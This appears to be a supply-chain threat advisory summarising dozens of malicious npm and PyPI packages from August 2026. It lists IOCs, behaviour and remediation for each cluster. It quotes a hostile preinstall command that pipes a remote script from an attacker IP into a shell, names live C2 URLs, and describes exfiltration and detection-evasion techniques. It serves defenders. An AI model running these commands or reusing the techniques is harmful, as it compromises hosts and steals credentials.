Feed
HighPublished 29 Aug 2026Updated 30 Aug 202646 packages · 49 versions

GitHub Advisory malware sweep - 2026-08-29 batch (npm `access-token-delta` vercel.app remote-eval cluster (3, `eth-pino` + `js-array-tokens` + `js-tokens-array`) + npm `limbomail.com` Discord-MFA Windows dropper pair (`mfacord` + `mfakit`) + npm `secretkey2fa` Minecraft/Microsoft-account stealer + npm `supersignaturenature` RSA/DES chain via `manager-thedate` + npm `techportal` HTTP+DNS beacon to `oob.asm5.net` + npm `vs-modules` Windows .bat dropper + npm `vitest-chalk-pro` jsonbin.io detached-child C2 + npm `repo.securityctrl.com` mass dependency-confusion probe (18+ enterprise namespaces: Intuit, Atlassian, Firebase, Postman, Oracle, Amplitude, Ring, Alimama, Nx, Libra…) + npm `grafeno-*` preinstall + cron persistence cluster (9 packages, 216.126.236.46/x.sh) + PyPI `calcboxlite` + `pygame-renderkit` misc + massive scripted CWE-506 bursts (`3layerdipstack*` ~100+, `classlink-*` ~100+))

Summary

Large 24h window ending 2026-08-29: the standout is a compromise of @7nohe/openapi-react-query-codegen by the "Trinitite" Mini Shai-Hulud continuation (tracked separately). Around it: three coordinated operator clusters with full IOCs (npm vercel.app remote-eval typosquats, npm limbomail.com Discord-MFA droppers, npm repo.securityctrl.com mass enterprise-namespace dependency-confusion probe), a grafeno-* cron-persistence cluster, and hundreds of scripted CWE-506 boilerplate burst-publishes (3layerdipstack*, classlink-*).

dependency-confusiontyposquatinfostealercredential-theftci-cd-compromisedns-exfiltrationobfuscationaccount-takeover
Detected by
GitHub Advisory Database · OpenSSF malicious-packages · OpenSSF Package Analysis · Amazon Inspector · kam193
Also known as
2026-08-29 GHSA sweep · 2026-08-access-token-delta vercel remote-eval typosquats · 2026-08-limbomail Discord-MFA Windows dropper · 2026-08-securityctrl dependency-confusion probe · 2026-08-grafeno cron persistence · 2026-08-3layerdipstack burst · 2026-08-classlink burst · 2026-08-pygame-renderkit
Ecosystems
npmPyPI
Packages tracked
46

What happened

The 24-hour window ending 2026-08-29 published a very large batch of new GHSA malware advisories - the headline is a compromise of @7nohe/openapi-react-query-codegen by a new "Trinitite" Mini Shai-Hulud worm (tracked separately in npm-2026-08-28-trinitite-openapi-react-query-codegen). Around it: three tightly-coordinated npm operator clusters with full IOCs, a Brazilian-fintech-targeted grafeno-* cron-persistence cluster, a mass enterprise-namespace dependency-confusion probe hitting more than 18 confirmed namespaces from repo.securityctrl.com, and two scripted bursts (3layerdipstack*, classlink-*) numbering in the hundreds of low-signal CWE-506 boilerplate advisories.

Cluster A - npm access-token-delta.vercel.app / ipcheck-hashed.vercel.app remote-eval typosquat cluster

| Package | Versions | GHSA | Source hash | MAL id | Endpoint | |---|---|---|---|---|---| | eth-pino | 2.0.3 | GHSA-v75q-x2qc-4c7r | 81e08c03…5fb8c1 | MAL-2026-15554 | ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df | | js-array-tokens | 1.0.2 | GHSA-ffxr-prpr-hxxc | 3d54ea75…056023 | MAL-2026-15555 | access-token-delta.vercel.app/ | | js-tokens-array | 1.0.0, 1.1.1 | GHSA-8crw-r25r-mwv4 | 3f8ed553…dcc35b | MAL-2026-15556 | access-token-delta.vercel.app/ |

On module load each package reconstructs a Vercel URL from a char-code array, fetches JSON, and passes the response's token field to eval() (or new Function()). Payloads are mutable, so what was delivered on installation depends entirely on when the install ran. eth-pino typosquats pino; js-array-tokens / js-tokens-array typosquat the extremely popular js-tokens tokenizer.

Cluster B - npm limbomail.com Discord-MFA Windows dropper pair

| Package | Versions | GHSA | Source hash | MAL id | |---|---|---|---|---| | mfacord | 1.0.2, 1.0.3 | GHSA-cx4f-wffj-qfxm | 6e8426c0…c970e | MAL-2026-15557 | | mfakit | 1.4.0 | GHSA-r4f7-w4j9-xj27 | f11dc9d3…3fb8 | MAL-2026-15558 |

Shared IOCs (same operator): C2 https://limbomail.com/api/attachment/r_Ea6rT_kGfT.o7nh0aBVvDQWmOG47NPBQ3pUjd_uHeiw; dropped file %APPDATA%\Microsoft\Windows\WinSxS\Backup\winsvc.js; VBS launcher in Startup; HKCU\...\Run persistence; re-fetch every ~2h with TLS verification disabled.

Cluster C - npm secretkey2fa@1.0.1 Minecraft / Microsoft-account stealer

| Package | Version | GHSA | Source hash | MAL id | |---|---|---|---|---| | secretkey2fa | 1.0.1 | GHSA-wrp2-cvjj-h5jx | e1da4c28…8f501a | MAL-2026-15559 |

Windows-only postinstall: enumerates Windows Credential Manager via PowerShell P/Invoke; steals Minecraft launcher JSON, Microsoft Account refresh + access tokens, Xbox Live tokens; decrypts browser saved credentials via Chromium DPAPI; exfiltrates via a hardcoded Discord webhook (XOR-0x3F encoded). Anti-analysis env gate skips execution under npm audit / npm pack / CI.

Cluster D - npm supersignaturenature + manager-thedate RSA/DES chain

| Package | Versions | GHSA | Source hash | MAL id | |---|---|---|---|---| | supersignaturenature | 1.0.5, 1.0.6 | GHSA-v7mw-8r4v-4jqq | ab1df028…75e4b15 | MAL-2026-15560 |

Encrypted rsaToken in the tarball is decrypted with a DES key fetched from the runtime dependency manager-thedate (pinned to latest), then the decrypted JavaScript is executed via child_process.spawn('node', [], ...) on stdin. The latest pin on manager-thedate is the payload-rotation channel - the operator can change what the payload does without republishing supersignaturenature.

Cluster E - npm techportal@4.0.10 HTTP + DNS beacon

| Package | Version | GHSA | Source hash | MAL id | IOCs | |---|---|---|---|---|---| | techportal | 4.0.10 | GHSA-649g-mjr9-4j74 | 2d947d5b…23242f3 | MAL-2026-15561 | http://45.76.249.245/beacon/techportal/4.0.10; *.oob.asm5.net (3 collectors) |

preinstall runs node beacon.js. HTTP POST first, DNS-subdomain-label fallback second - the DNS fallback bypasses HTTP-only egress proxies.

Cluster F - npm vs-modules@1.2.2 Windows .bat dropper

| Package | Version | GHSA | Source hash | IOC | |---|---|---|---|---| | vs-modules | 1.2.2 | GHSA-vg83-965g-3w5v | dcd50c73…efedb57 | http://whaomydaddy.bts-the-time-in-shanghai.netlify.app/hey.bat |

preinstall runs node resources.js which downloads hey.bat to %TEMP% via plain HTTP curl and executes it. Windows-only.

Cluster G - npm vitest-chalk-pro@10.0.7 jsonbin C2

| Package | Version | GHSA | Source hash | MAL id | IOC | |---|---|---|---|---|---| | vitest-chalk-pro | 10.0.7 | GHSA-rjfw-6xw6-qjfx | 4718de97…156f0e | MAL-2026-15563 | https://api.jsonbin.io/v3/b/6a62bc86da38895dfe879659 |

postinstall spawns a detached, silenced-stdio child that fetches JSON and executes via new Function(). Payload is mutable at any time.

Cluster H - npm repo.securityctrl.com mass dependency-confusion probe

Self-referential package.json dependency whose value is "<pkgname>": "https://repo.securityctrl.com/<pkgname>". During npm install the URL is fetched and executed without integrity verification.

| Package | Versions | GHSA | Namespace target | |---|---|---|---| | intuit-authz | 55.0.0 | GHSA-7v69-f2ff-7267 | Intuit | | one-intuit-help-system-utils | 45.0.0 | GHSA-hj36-mq3p-257w | Intuit | | qbo-ui-services | 45.0.0 | GHSA-pqq9-pc7f-qg9c | Intuit / QuickBooks | | payments-ui-services | 45.0.0 | GHSA-gh4x-ppwf-3j59 | Intuit | | jira-projects-backbone | 45.0.0 | GHSA-mgjj-8534-64gp | Atlassian | | confluence-rest | 30.0.0 | GHSA-wxw7-x2qj-6jh2 | Atlassian | | firestore-lite | 45.0.0 | GHSA-r28g-prq7-6j7p | Google Firebase | | amplitude-experiment | 55.0.0 | GHSA-758g-5xc5-pm3c | Amplitude | | paper-password-input | 45.0.0 | GHSA-g76m-37ph-2w5c | React-native-paper lookalike | | oit-lib-oracle-util | 45.0.0 | GHSA-8jwf-jxvr-v3qg | Oracle | | nx-app | 9999.0.0-security-test | GHSA-h9j7-rx3x-rwhc | Nrwl / Nx | | alimama-minisite | 45.0.0 | GHSA-587j-f248-fmvr | Alimama (Alibaba) | | librastandardlib | 45.0.0 | GHSA-g4fg-jh8h-vf3p | Libra / Diem | | mkt-ui-library | 45.0.0 | GHSA-58mp-f2cw-5j5r | Generic enterprise UI | | bui-react-10themes | >= 45.0.0 | GHSA-jv92-xghh-84rr | Generic enterprise UI | | sentrykit | 30.0.0 | GHSA-mr25-fm7h-7p84 | Sentry-lookalike | | vui-gateway | 45.0.0 | GHSA-799x-vgvf-pxp4 | Generic | | search-reservation | 55.0.0 | GHSA-293v-ghq2-4rr4 | Generic |

GHSA carries dozens more names in the same publisher fingerprint than are enumerated above - treat every flagged package matching the pattern "implausibly-high major-version + repo.securityctrl.com IOC" as one campaign. The 9999.0.0-security-test suffix on nx-app reads as legitimate security-research red-team activity, but the mechanism executes code from an external URL on install regardless of intent.

Cluster I - npm grafeno-* preinstall + cron persistence

Every package: preinstall runs curl http://216.126.236.46/x.sh | sh then adds a crontab entry re-fetching x.sh every 30 minutes.

| Package | Versions | GHSA | Source hash | |---|---|---|---| | grafeno-auth | 1.0.0 | GHSA-wp54-r527-gf42 | c3c99ded…7ca59a | | grafeno-client | 1.0.0 | GHSA-682f-95rp-28w4 | 61f8e4ee…2ccb6 | | grafeno-utils | 1.0.0 | GHSA-hfcc-rc45-2cgg | 5beb233f…4d32ad | | grafeno-config | 1.0.0 | GHSA-r3jq-7mgh-v97x | ebbea90a…4ce6af | | grafeno-api | 1.0.0, 1.0.1 | GHSA-qh5m-rwf7-x3r2 | 6324266a…4333c | | grafeno-core | 1.0.0, 1.0.1 | GHSA-6g3v-w4g2-wpjc | 19a2990a…4c759e | | grafeno-pix | 1.0.0, 1.0.1 | GHSA-4wxj-99qv-hg78 | a5c5e164…6c3f3 | | grafeno-logger | 1.0.0, 1.0.1 | GHSA-pv35-j495-vmj4 | 64770429…d413 | | grafeno-sdk | 1.0.0, 1.0.1 | GHSA-fg63-r25c-3gf6 | 665dd78a…102ad3 |

Brazilian fintech target: Grafeno is a Brazilian banking-as-a-service provider; grafeno-pix explicitly references Brazil's PIX payment rails. Any Brazilian fintech running internal @grafeno/*-adjacent scopes should audit resolver configuration.

Cluster J - npm scripted CWE-506 boilerplate mass bursts

  • 3layerdipstack<random> cluster: 100+ packages, each 3layerdipstack + 6-8 random alphanumeric characters, all >= 0, all pure CWE-506 boilerplate. Spans pages 4-15+ of the GHSA npm-malware listing on 2026-08-29.
  • classlink-<random> cluster: 100+ packages, each classlink- + 8-char random suffix, all >= 0, all pure CWE-506 boilerplate. Spans pages ~20-30+ of the GHSA listing on 2026-08-29.
  • Additional low-signal boilerplate this batch: eip712-lite (GHSA-p5jf-vqp6-95h5, Ethereum EIP-712 typosquat), clmm-fee-audit (GHSA-68fh-772h-wjfw, Solana CLMM theme), borsh-lite (GHSA-6m7x-mwxq-f3wf, Solana Borsh typosquat), mfa-js (GHSA-2p92-fvvr-75hj), ozturk-mfa (GHSA-wrj4-48g5-vg88).

No per-package IOCs published for the boilerplate advisories - defensive value is prefix-level: block 3layerdipstack* and classlink-* at your registry / SCA layer and move on.

Cluster K - PyPI calcboxlite + pygame-renderkit misc

| Package | Version | GHSA | Source hash | Note | |---|---|---|---|---| | calcboxlite | 1.0 | GHSA-q2qg-w4f2-8v29 | 227fe04d…7afd09 | HTTP POST to k4m2qhx7ptv9nzcr3bwe8syd6ljfa0gu1.oast.invalid/collect; MAL-2026-15488 | | pygame-renderkit | 1.2.0 | GHSA-53q9-ghm7-r8g3 | 5856daeb…5f78f9 | setup.py override; reverse shell; campaign 2026-08-pygame-renderkit |

The .invalid TLD on calcboxlite confirms out-of-band pentest probing; pygame-renderkit's reverse shell in setup.py is a real live payload.

Registry state

All enumerated packages were flagged / yanked on npm and PyPI during the 2026-08-28 / 2026-08-29 takedown windows. Internal mirrors routinely keep serving yanked tarballs; re-sync every mirror.

Related tracked activity

  • "Trinitite" Mini Shai-Hulud continuation - tracked separately in npm-2026-08-28-trinitite-openapi-react-query-codegen. Cluster H's dependency-confusion probe against intuit-authz shares no operator overlap with Trinitite - two independent campaigns landing in the same 24h window.
  • 2026-08-ekx-report-utils PyPI DNS-exfil family (updated 2026-08-29): three additional PyPI packages (yaml-report-formatter, yamlformat-tools, yamlformatter-utils) added to the multi-2026-08-28-ghsa-malware-sweep Cluster D under the shared campaign identifier.
  • issue_comment release-workflow abuse - the same trigger class exploited in Codfish semantic-release-action (2026-06-24) drove the Trinitite compromise; author-association gates on issue_comment and pull_request_target triggers remain the most under-defended CI-CD hardening step across npm-registered maintainers.
  • Discovery credits: GitHub Advisory Database, OpenSSF malicious-packages, OpenSSF Package Analysis, Amazon Inspector, kam193 (bad-packages.kam193.eu), Aikido Security (Trinitite), SafeDep (Trinitite).

Affected packages (46)

These are usually pulled in as transitive dependencies rather than installed directly. Check your whole tree at once - it runs in your browser and nothing is uploaded.

Impact

  • Cluster A - npm access-token-delta.vercel.app / ipcheck-hashed.vercel.app remote-eval typosquat cluster (2026-08-29, 3 packages): eth-pino@2.0.3 (GHSA-v75q-x2qc-4c7r, hash 81e08c035ca41519f1d57d389027befac80a8ee8405612825b633967db5fb8c1, MAL-2026-15554), js-array-tokens@1.0.2 (GHSA-ffxr-prpr-hxxc, hash 3d54ea75aacb3eed3e1f1739093eb9b0092203fafca42d590bce038530056023, MAL-2026-15555), js-tokens-array@1.0.0, 1.1.1 (GHSA-8crw-r25r-mwv4, hash 3f8ed5536e88f2c77c432b868367e25dea9244052779e825999e6e4324dcc35b, MAL-2026-15556). All three reconstruct a Vercel-hosted URL from a char-code array on module load, fetch a JSON response, and pass the response's token field directly to eval() (or new Function()) - full remote-code execution in any Node.js process that require()s them, with the payload mutable at any time by the operator. eth-pino typosquats pino (the log library) with an Ethereum-flavoured prefix; js-array-tokens and js-tokens-array typosquat the popular js-tokens tokenizer (110M weekly downloads). IOCs: https://access-token-delta.vercel.app/ (js-array-tokens, js-tokens-array), https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df (eth-pino). Sequential MAL-2026-15554/15555/15556 IDs confirm one operator
  • Cluster B - npm limbomail.com Discord-MFA Windows dropper pair (2026-08-29, 2 packages): mfacord@1.0.2, 1.0.3 (GHSA-cx4f-wffj-qfxm, hash 6e8426c0e4e80e0bd9839d8517e060bd923775b8a3e100aab57e18b4f47c970e, MAL-2026-15557) and mfakit@1.4.0 (GHSA-r4f7-w4j9-xj27, hash f11dc9d39df6906a4b784b0cb3a584b5307816d20c4cc04fb28bbb40f59c3fb8, MAL-2026-15558). Both masquerade as "lightweight Discord MFA/TOTP libraries" and share the identical C2 URL https://limbomail.com/api/attachment/r_Ea6rT_kGfT.o7nh0aBVvDQWmOG47NPBQ3pUjd_uHeiw and the identical dropped-file path %APPDATA%\Microsoft\Windows\WinSxS\Backup\winsvc.js - same operator. On Windows only: decode obfuscated URL, download script to the WinSxS\Backup path, hide it via file attributes, deploy a VBS launcher to the user's Startup folder, register HKCU\...\Run persistence, re-fetch every ~2 hours with TLS verification disabled. Anyone who ran npm install for these on Windows: assume a persistent scheduled downloader is live on the box
  • Cluster C - npm secretkey2fa@1.0.1 Minecraft / Microsoft-account stealer (2026-08-29, 1 package): secretkey2fa@1.0.1 (GHSA-wrp2-cvjj-h5jx, hash e1da4c2863f6f6fb95a1ab802243bfde5e04a71e4aa6f0b41f940502d58f501a, MAL-2026-15559). Masquerades as a "lightweight TOTP/HOTP library". postinstall on Windows: enumerates Windows Credential Manager via PowerShell P/Invoke, steals Minecraft launcher account JSONs and Microsoft Account refresh + access tokens (login.live.com, Xbox Live, minecraftservices), decrypts browser saved credentials via Chromium DPAPI, exfiltrates via a hardcoded Discord webhook (XOR-0x3F encoded). Includes an anti-analysis env gate that skips execution during npm audit / npm pack / CI to lower discovery odds. Any Windows user who ran this: rotate Microsoft Account / Xbox / Minecraft credentials and browser saved passwords from a clean host
  • Cluster D - npm supersignaturenature@1.0.5, 1.0.6 RSA/DES chain via manager-thedate dependency (2026-08-29, 1 direct package + 1 chained runtime dep): supersignaturenature@1.0.5, 1.0.6 (GHSA-v7mw-8r4v-4jqq, hash ab1df02839294b29ff278b7a80505be50de75eb0f317f4bf29635236a75e4b15, MAL-2026-15560). Distributed tarball carries an encrypted rsaToken file absent from the source repository; on install a DES key is pulled from the runtime dependency manager-thedate (pinned to latest), used to decrypt the token, and the decrypted JavaScript is executed via child_process.spawn('node', [], ...) on stdin. The latest pin on manager-thedate is the interesting operational detail: the operator can rotate the payload post-installation by publishing a new manager-thedate release, without needing to touch supersignaturenature again
  • *Cluster E - npm techportal@4.0.10 HTTP + DNS beacon to `.oob.asm5.net (2026-08-29, 1 package)**: techportal@4.0.10 (GHSA-649g-mjr9-4j74, hash 2d947d5b4ddaa0ea6a25488fb5b5a66b3afc5c8f56d5ac38fb2e95e4b23242f3, MAL-2026-15561). preinstall runs node beacon.js, collects hostname / username / cwd, base32-encodes, POSTs to http://45.76.249.245/beacon/techportal/4.0.10; on HTTP failure/timeout falls back to packing the same identifiers as base32 DNS subdomain labels queried against three hardcoded *.oob.asm5.net collector domains. Egress-firewall bypass: DNS-based fallback survives HTTP-only proxy policies. The oob.asm5.net "out-of-band" naming is characteristic of pentest tooling (asm5` reads as a pentester callsign) but a real hit still yields useful reconnaissance to the operator
  • Cluster F - npm vs-modules@1.2.2 Windows .bat dropper (2026-08-29, 1 package): vs-modules@1.2.2 (GHSA-vg83-965g-3w5v, hash dcd50c73d1e9bbca9b707d80936562866b7469239c038a540c02a9f43efedb57). preinstall hook runs node resources.js, downloads http://whaomydaddy.bts-the-time-in-shanghai.netlify.app/hey.bat (plain HTTP, obfuscator.io-style string-array obfuscation), drops to %TEMP%, and executes via child_process.exec without integrity check. Windows-only. Any Windows box that ran npm install for vs-modules@1.2.2 should be treated as executing arbitrary code from a Netlify-hosted .bat
  • Cluster G - npm vitest-chalk-pro@10.0.7 jsonbin.io detached-child C2 (2026-08-29, 1 package): vitest-chalk-pro@10.0.7 (GHSA-rjfw-6xw6-qjfx, hash 4718de971af33ad02b8945e1b981e30d1decbf9c7d1006f37a641cd822156f0e, MAL-2026-15563). postinstall spawns a detached child (silenced stdio) that uses axios to fetch https://api.jsonbin.io/v3/b/6a62bc86da38895dfe879659 and executes the response via new Function(). Payload is mutable at any time by the operator; the detached-child + silenced-stdio combo means the child survives the parent npm install completing and does not surface in normal install output. Masquerades as a vitest/chalk utility but internally mimics nodemailer's package shape
  • Cluster H - npm repo.securityctrl.com mass enterprise-namespace dependency-confusion probe (2026-08-29, 18+ packages, "9999.0.0-security-test" / 30.0.0 / 45.0.0 / 55.0.0 versions): implausibly-high version numbers + a self-referential dependency in package.json whose value is a bare HTTPS URL rather than a registry version range - specifically "<pkgname>": "https://repo.securityctrl.com/<pkgname>". During npm install the URL is fetched and executed without integrity verification, granting arbitrary code execution via lifecycle scripts on any internal CI that misresolves to the public registry. Confirmed names span major enterprise namespaces: Intuit (intuit-authz@55.0.0, one-intuit-help-system-utils@45.0.0, qbo-ui-services@45.0.0, payments-ui-services@45.0.0); Atlassian (jira-projects-backbone@45.0.0, confluence-rest@30.0.0); Firebase (firestore-lite@45.0.0); Amplitude (amplitude-experiment@55.0.0); Postman (paper-password-input@45.0.0 - matches Postman React lookalike naming); Oracle (oit-lib-oracle-util@45.0.0); Nx (nx-app@9999.0.0-security-test); Alimama / Alibaba (alimama-minisite@45.0.0); Libra/Diem (librastandardlib@45.0.0); plus enterprise-UI names (mkt-ui-library@45.0.0, bui-react-10themes@>=45.0.0, sentrykit@30.0.0, vui-gateway@45.0.0, search-reservation@55.0.0). The GHSA listing on 2026-08-29 shows dozens more names in the same pattern than are enumerated here - the entire flagged set on GHSA for that publisher fingerprint should be treated as one campaign. The 9999.0.0-security-test version suffix on nx-app strongly suggests legitimate red-team / security research, but the mechanism is real: any internal CI misconfigured to fall through to the public registry would execute code from repo.securityctrl.com regardless of who published it
  • *Cluster I - npm `grafeno- preinstall + cron persistence cluster (2026-08-29, 9 packages, 216.126.236.46/x.sh)**: grafeno-auth@1.0.0 (GHSA-wp54-r527-gf42, hash c3c99ded091548bc464635b9c1151368873851c4a97036279f46f74b5c7ca59a), grafeno-client@1.0.0 (GHSA-682f-95rp-28w4, hash 61f8e4ee9fb4623ef1d751c00c885e412b6e6760d0aaf79c655272a90882ccb6), grafeno-utils@1.0.0 (GHSA-hfcc-rc45-2cgg, hash 5beb233fe40ca775519f2262a691a45445a9bda31c970d12aca3c584be4d32ad), grafeno-config@1.0.0 (GHSA-r3jq-7mgh-v97x, hash ebbea90af14e110b5dcef171163ea3029f6655ecf623595c251f44db674ce6af), grafeno-api@1.0.0, 1.0.1 (GHSA-qh5m-rwf7-x3r2, hash 6324266ac0f7a76fc3a8e8209d194daa17bdd47c913207f218f7c1683db4333c), grafeno-core@1.0.0, 1.0.1 (GHSA-6g3v-w4g2-wpjc, hash 19a2990abd7b4447444a42f96636f738449235f9d8760191978e904d028c759e), grafeno-pix@1.0.0, 1.0.1 (GHSA-4wxj-99qv-hg78, hash a5c5e1649c30ab63a97fde3073d5e838ea91f5b2eca8149242f0fb24e286c3f3), grafeno-logger@1.0.0, 1.0.1 (GHSA-pv35-j495-vmj4, hash 6477042981913de82e89d0f0c3c5b1b278afd21c401922932eb8756427e1d413), grafeno-sdk@1.0.0, 1.0.1 (GHSA-fg63-r25c-3gf6, hash 665dd78adc2d9c5f30bd8b140dc2dfc5bf9e61efb96ea9945018154d43102ad3). Every package: **preinstall hook that curls http://216.126.236.46/x.sh over plain HTTP and pipes it to shell, then adds a crontab entry that re-fetches every 30 minutes** - initial compromise plus a persistent 30-minute-cadence downloader on Linux / macOS build boxes. grafeno-* naming suggests targeting Brazilian fintech (Grafeno is a Brazilian banking-as-a-service provider; grafeno-pix explicitly references Brazil's PIX payment rails). Every affected build box needs its crontab audited and any x.sh`-triggered persistence purged
  • Cluster J - npm scripted CWE-506 boilerplate mass bursts (2026-08-28, 200+ packages across two clusters): 3layerdipstack<random-suffix> cluster (100+ packages, GHSA IDs at least across pages 4-15 of the current GHSA npm-malware listing, all >= 0 versions, all pure CWE-506 boilerplate advisories) and classlink-<random-suffix> cluster (100+ packages, similar scripted burst, all pure CWE-506 boilerplate). No per-package IOCs published. The publish-flood pattern - random alphanumeric suffixes on a fixed root name, hundreds of publishes within one window - is characteristic of scripted-account abuse. The exact operational value here is "if any lockfile hit lands under 3layerdipstack* or classlink-*, uninstall it - no defensive review is worth spending on any single member". Also in this cluster tail: eip712-lite (GHSA-p5jf-vqp6-95h5, Ethereum EIP-712 typosquat), clmm-fee-audit (GHSA-68fh-772h-wjfw, Solana Concentrated Liquidity Market Maker theme), borsh-lite (GHSA-6m7x-mwxq-f3wf, Solana Borsh serialisation typosquat), mfa-js (GHSA-2p92-fvvr-75hj), ozturk-mfa (GHSA-wrj4-48g5-vg88) - all >= 0, all CWE-506 boilerplate with no per-package IOCs
  • Cluster K - PyPI calcboxlite + pygame-renderkit misc (2026-08-28, 2 packages): calcboxlite@1.0 (GHSA-q2qg-w4f2-8v29, hash 227fe04d85516bd5348dea2c0c25078d057eacb4f439fd6a241ea0409b7afd09, MAL-2026-15488). Install-time and import-time HTTP-POST exfil of username + hostname to https://k4m2qhx7ptv9nzcr3bwe8syd6ljfa0gu1.oast.invalid/collect - the .invalid TLD is the tell that this is a pentest / OAST callback probe (a Burp Collaborator-style out-of-band beacon). pygame-renderkit@1.2.0 (GHSA-53q9-ghm7-r8g3, hash 5856daeb3070a9b2a6ffc42d8999ff49c63706ccb27ee683e5fcc4ff175f78f9, campaign 2026-08-pygame-renderkit). setup.py command override that exfiltrates env vars and files, drops a persistence stub, and opens a reverse shell for remote command execution
  • Standalone tracked separately - @7nohe/openapi-react-query-codegen "Trinitite" worm compromise (2026-08-28, 10 versions): not enumerated in this sweep - covered in dedicated record npm-2026-08-28-trinitite-openapi-react-query-codegen. Any team using TanStack Query codegen against OpenAPI schemas should read that record first

What to do

  1. 1Grep every lockfile (package-lock.json, yarn.lock, pnpm-lock.yaml, requirements.txt, Pipfile.lock, poetry.lock, uv.lock) for: eth-pino, js-array-tokens, js-tokens-array, mfacord, mfakit, secretkey2fa, supersignaturenature, manager-thedate, techportal, vs-modules, vitest-chalk-pro, intuit-authz, one-intuit-help-system-utils, qbo-ui-services, payments-ui-services, jira-projects-backbone, confluence-rest, firestore-lite, amplitude-experiment, paper-password-input, oit-lib-oracle-util, nx-app, alimama-minisite, librastandardlib, mkt-ui-library, bui-react-10themes, sentrykit, vui-gateway, search-reservation, grafeno-auth, grafeno-client, grafeno-utils, grafeno-config, grafeno-api, grafeno-core, grafeno-pix, grafeno-logger, grafeno-sdk, eip712-lite, clmm-fee-audit, borsh-lite, mfa-js, ozturk-mfa, calcboxlite, pygame-renderkit. For the 3layerdipstack* and classlink-* clusters: grep for the prefix alone (grep -E "\"(3layerdipstack|classlink-)" package-lock.json) since 100+ names are in each
  2. 2For Cluster A (eth-pino / js-array-tokens / js-tokens-array remote-eval typosquats): uninstall on hit; anyone who require()d these executed arbitrary JavaScript delivered by access-token-delta.vercel.app / ipcheck-hashed.vercel.app. Because those Vercel endpoints are attacker-mutable, the exact payload delivered depends on when the install happened - treat every install-time environment as fully compromised. Block those two Vercel hostnames at egress and audit any developer / CI box that resolved them. The js-tokens legitimate package has no -array variants; any developer typing npm install js-tokens-array in the future is still at risk, so add these names to your allow/deny lists
  3. 3For Cluster B (limbomail.com Discord-MFA Windows dropper mfacord + mfakit): on any Windows host that ran npm install for either package, inspect and remove the file at %APPDATA%\Microsoft\Windows\WinSxS\Backup\winsvc.js, remove any VBS launcher in the user's Startup folder, and delete the HKCU\Software\Microsoft\Windows\CurrentVersion\Run entry pointing at that path. Block limbomail.com at egress; the payload re-fetches every ~2 hours so the persistence is active for as long as the entry lives
  4. 4For Cluster C (secretkey2fa Minecraft / Microsoft-account stealer): any Windows user who ran the install must rotate Microsoft Account credentials (change password to invalidate stolen refresh tokens), revoke Xbox Live sessions, rotate Minecraft launcher account, and rotate any browser saved credentials for that Windows profile. The env gate that suppresses execution during npm audit / npm pack / CI means a --dry-run or audit will not necessarily surface the payload
  5. 5For Cluster D (supersignaturenature + manager-thedate chain): uninstall both packages together and grep for manager-thedate specifically - it is the payload-rotation delivery vehicle; being on latest means any consumer who resolved manager-thedate after 2026-08-29 got the operator's current payload. npm ls manager-thedate across every workspace to find every indirect consumer
  6. 6For Cluster E (techportal HTTP + DNS beacon): uninstall on hit. Block 45.76.249.245 at egress. DNS-based fallback bypasses HTTP-only egress proxies: if your egress policy is proxy-only, either DNS-egress-block *.oob.asm5.net at your resolver, or - better - deny wildcard subdomain resolution for arbitrary TLDs from install-time contexts. For npm install in CI, --ignore-scripts prevents the preinstall beacon.js step from running
  7. 7For Cluster F (vs-modules Windows .bat dropper): uninstall on hit. Block bts-the-time-in-shanghai.netlify.app at egress. Any Windows host that installed vs-modules@1.2.2 executed an attacker-controlled batch file from %TEMP% - treat the box as compromised and rotate credentials
  8. 8For Cluster G (vitest-chalk-pro jsonbin C2): uninstall on hit. Block api.jsonbin.io at egress for install-time / postinstall-time contexts (or use --ignore-scripts in CI). Because the child is detached with silenced stdio, standard install logging will not show it - inspect the process tree for any child spawned by npm install that outlives the parent
  9. 9For Cluster H (repo.securityctrl.com mass dependency-confusion probe against enterprise namespaces): if you run internal CI for Intuit, Atlassian, Firebase, Postman, Oracle, Amplitude, Alimama/Alibaba, Nx, or any of the other confirmed target namespaces, audit your npm resolver configuration immediately. Pin scope-registry mappings via .npmrc (@intuit:registry=https://<internal>, @atlassian:registry=https://<internal>, etc.) and ensure the CI environment cannot fall through to the public registry on internal-index failure. Also block the entire repo.securityctrl.com domain at egress for CI environments - a legitimate build should never need to fetch package tarballs from an arbitrary HTTPS URL that is not the registry. Any package.json in any repo containing a self-referential dependency whose value is a bare HTTPS URL is a red flag regardless of the specific host
  10. 10*For Cluster I (`grafeno- preinstall + cron persistence)**: on any Linux / macOS build box that ran npm install for any grafeno-* package, run crontab -l (as every user account that touched the install) and remove any entry pointing at 216.126.236.46 or x.sh. Block 216.126.236.46 at egress. Brazilian fintech shops using the legitimate Grafeno` BaaS should audit their internal package scopes: this operator is naming-target-selecting your ecosystem specifically
  11. 11*For Cluster J (mass `3layerdipstack / classlink-` bursts + eip712-lite / clmm-fee-audit / borsh-lite / mfa-js / ozturk-mfa)*: uninstall on any hit and rebuild lockfiles. Because 100+ packages are in each burst cluster, add the prefixes themselves to your registry / SCA deny-list. For crypto-themed names (eip712-lite, clmm-fee-audit, borsh-lite): confirm the developer intended the legitimate underlying library (viem/ethers for EIP-712; @raydium-io/raydium-sdk or @orca-so/whirlpools for CLMM; borsh for the real Solana serialisation library) rather than these lightweight-sounding forks
  12. 12For Cluster K (calcboxlite + pygame-renderkit): uninstall on hit. calcboxlite's .invalid OAST callback confirms it is out-of-band pentest probing rather than a live campaign against your data, but the install-time HTTP POST still leaks hostname + username. pygame-renderkit's reverse shell in setup.py is a real hit; any pip environment that installed it should be treated as compromised and rebuilt from scratch
  13. 13For all npm install runs in CI, prefer --ignore-scripts - Clusters A, B, F, G, H, I all execute via lifecycle scripts (preinstall or postinstall). For all pip install runs in CI, prefer --only-binary=:all: and pin to source hashes - Clusters C, K exploit setup.py overrides on sdist installs. For npm scoped enterprise namespaces, pin scope-registry mappings in .npmrc and deny public-registry fallback on internal-namespace resolution failures
  14. 14Verify none of these packages still resolves via your private mirror (Nexus / Artifactory / Verdaccio / internal npm proxy) - internal caches routinely keep serving yanked tarballs after the public takedown

References

multi-2026-08-29-ghsa-malware-sweep